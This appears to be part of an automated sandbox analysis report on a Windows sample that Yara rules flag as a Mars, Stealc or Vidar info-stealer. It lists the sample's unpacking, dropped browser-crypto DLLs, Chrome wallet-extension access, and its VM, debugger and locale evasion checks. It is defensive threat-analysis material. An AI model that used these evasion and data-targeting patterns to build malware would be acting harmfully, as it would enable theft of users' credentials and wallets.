Source:	Binary string: mozglue.pdbP source: q27UFusYdn.exe, 00000000.00000002.2196180891.000000006CD6D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: nss3.pdb@ source: q27UFusYdn.exe, 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: C:\coxisenijiw\cek-rok78_texuhevujodaz92\tilajelew_c.pdb source: q27UFusYdn.exe
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source:	Binary string: nss3.pdb source: q27UFusYdn.exe, 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: mozglue.pdb source: q27UFusYdn.exe, 00000000.00000002.2196180891.000000006CD6D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\q27UFusYdn.exe

Unpacked PE file: 0.2.q27UFusYdn.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\q27UFusYdn.exe

Unpacked PE file: 0.2.q27UFusYdn.exe.400000.0.unpack

Source: C:\Users\user\Desktop\q27UFusYdn.exe

Code function: 0_2_00416240 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00416240

Source: msvcp140[1].dll.0.dr	Static PE information: section name: .didat
Source: nss3.dll.0.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3.dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr	Static PE information: section name: .didat

Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_004176C5 push ecx; ret		0_2_004176D8
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CD2B536 push ecx; ret		0_2_6CD2B549

Source: C:\Users\user\Desktop\q27UFusYdn.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\q27UFusYdn.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\q27UFusYdn.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\q27UFusYdn.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\q27UFusYdn.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\q27UFusYdn.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\q27UFusYdn.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\q27UFusYdn.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\q27UFusYdn.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\q27UFusYdn.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\q27UFusYdn.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\q27UFusYdn.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll	Jump to dropped file

Source: C:\Users\user\Desktop\q27UFusYdn.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\q27UFusYdn.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\q27UFusYdn.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\q27UFusYdn.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\q27UFusYdn.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\q27UFusYdn.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\q27UFusYdn.exe

0_2_00416240

Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\Desktop\q27UFusYdn.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

graph_0-77103

Source: C:\Users\user\Desktop\q27UFusYdn.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\q27UFusYdn.exe

API coverage: 6.7 %

Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_00412570 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00412570
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_0040D1C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_0040D1C0
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_004015C0 LocalAlloc,FindFirstFileA,StrCmpCA,StrCmpCA,SetThreadLocale,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_004015C0
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_00411650 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_00411650
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_0040B610 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_0040B610
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_0040DB60 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_0040DB60
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_00411B80 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_00411B80
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_0040D540 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0040D540
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_004121F0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_004121F0

Source: C:\Users\user\Desktop\q27UFusYdn.exe

Code function: 0_2_00401120 GetSystemInfo,ExitProcess,

0_2_00401120

Source: C:\Users\user\Desktop\q27UFusYdn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\q27UFusYdn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\q27UFusYdn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\q27UFusYdn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\q27UFusYdn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\q27UFusYdn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: Amcache.hve.6.dr	Binary or memory string: VMware
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.6.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.6.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.6.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.6.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.6.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: q27UFusYdn.exe, 00000000.00000002.2177189575.0000000004192000.00000004.00000020.00020000.00000000.sdmp, q27UFusYdn.exe, 00000000.00000002.2177189575.0000000004141000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.6.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.6.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.6.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.6.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.6.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.6.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.6.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.6.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.6.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: q27UFusYdn.exe, 00000000.00000002.2177189575.0000000004141000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: Amcache.hve.6.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.6.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.6.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.6.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.6.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.6.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: q27UFusYdn.exe, 00000000.00000002.2177189575.0000000004192000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW]?H
Source: Amcache.hve.6.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\q27UFusYdn.exe	API call chain: ExitProcess graph end node	graph_0-77109
Source: C:\Users\user\Desktop\q27UFusYdn.exe	API call chain: ExitProcess graph end node	graph_0-77088
Source: C:\Users\user\Desktop\q27UFusYdn.exe	API call chain: ExitProcess graph end node	graph_0-78134
Source: C:\Users\user\Desktop\q27UFusYdn.exe	API call chain: ExitProcess graph end node	graph_0-77091
Source: C:\Users\user\Desktop\q27UFusYdn.exe	API call chain: ExitProcess graph end node	graph_0-77141
Source: C:\Users\user\Desktop\q27UFusYdn.exe	API call chain: ExitProcess graph end node	graph_0-77117
Source: C:\Users\user\Desktop\q27UFusYdn.exe	API call chain: ExitProcess graph end node	graph_0-77102

Source: C:\Users\user\Desktop\q27UFusYdn.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\q27UFusYdn.exe

Code function: 0_2_00417B4E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

0_2_00417B4E

Source: C:\Users\user\Desktop\q27UFusYdn.exe

0_2_00416240

Source: C:\Users\user\Desktop\q27UFusYdn.exe

Code function: 0_2_00415DC0 mov eax, dword ptr fs:[00000030h]

0_2_00415DC0

Source: C:\Users\user\Desktop\q27UFusYdn.exe

Code function: 0_2_00404C70 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,

0_2_00404C70

Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_00419DC7 SetUnhandledExceptionFilter,	0_2_00419DC7
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_00417B4E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00417B4E
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_004173DD memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_004173DD
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CD2B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_6CD2B66C
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CD2B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6CD2B1F7
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Code function: 0_2_6CEDAC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6CEDAC62

HIPS / PFW / Operating System Protection Evasion

Searches for specific processes (likely to inject)

Source: C:\Users\user\Desktop\q27UFusYdn.exe

Code function: 0_2_00415D00 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_00415D00

Source: C:\Users\user\Desktop\q27UFusYdn.exe

Code function: 0_2_6CD2B341 cpuid

0_2_6CD2B341

Source: C:\Users\user\Desktop\q27UFusYdn.exe

Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,

0_2_00414570

Source: C:\Users\user\Desktop\q27UFusYdn.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\q27UFusYdn.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\q27UFusYdn.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\q27UFusYdn.exe

Code function: 0_2_00414450 GetProcessHeap,HeapAlloc,GetLocalTime,wsprintfA,

0_2_00414450

Source: C:\Users\user\Desktop\q27UFusYdn.exe

Code function: 0_2_004143C0 GetProcessHeap,HeapAlloc,GetUserNameA,

0_2_004143C0

Source: C:\Users\user\Desktop\q27UFusYdn.exe

Code function: 0_2_004144B0 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,

0_2_004144B0

Source: Amcache.hve.6.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected Mars stealer

Source: Yara match	File source: 0.2.q27UFusYdn.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.q27UFusYdn.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.q27UFusYdn.exe.43e0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.q27UFusYdn.exe.43e0e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.q27UFusYdn.exe.4410000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.q27UFusYdn.exe.4410000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2177312621.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1631316383.0000000004410000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected Stealc

Source: Yara match	File source: 00000000.00000002.2177189575.0000000004141000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: q27UFusYdn.exe PID: 6672, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 0.2.q27UFusYdn.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.q27UFusYdn.exe.43e0e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.q27UFusYdn.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.q27UFusYdn.exe.43e0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.q27UFusYdn.exe.4410000.0.raw.unpack, type: UNPACKEDPE
